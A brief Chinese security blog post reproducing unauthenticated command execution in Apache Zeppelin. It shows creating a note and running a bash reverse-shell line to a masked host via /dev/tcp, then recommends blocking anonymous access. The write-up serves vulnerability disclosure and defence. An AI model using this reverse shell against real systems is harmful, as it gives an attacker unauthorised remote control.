0x00 前言

Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。

Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档，并且支持多种语言，包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等。

0x01 漏洞复现

主要是未授权带来了命令执行漏洞，直接干货来操作：

1、Create New Note：

执行Linux反弹，使用sh。

2、执行反弹命令

bash -i &>/dev/tcp/xxxxxxx/xxxxx <&1

3、或者直接进行执行命令：

0x02 修复建议

禁止未授权匿名帐户访问

转载请注明：Adminxe's Blog » Zeppelin未授权访问getshell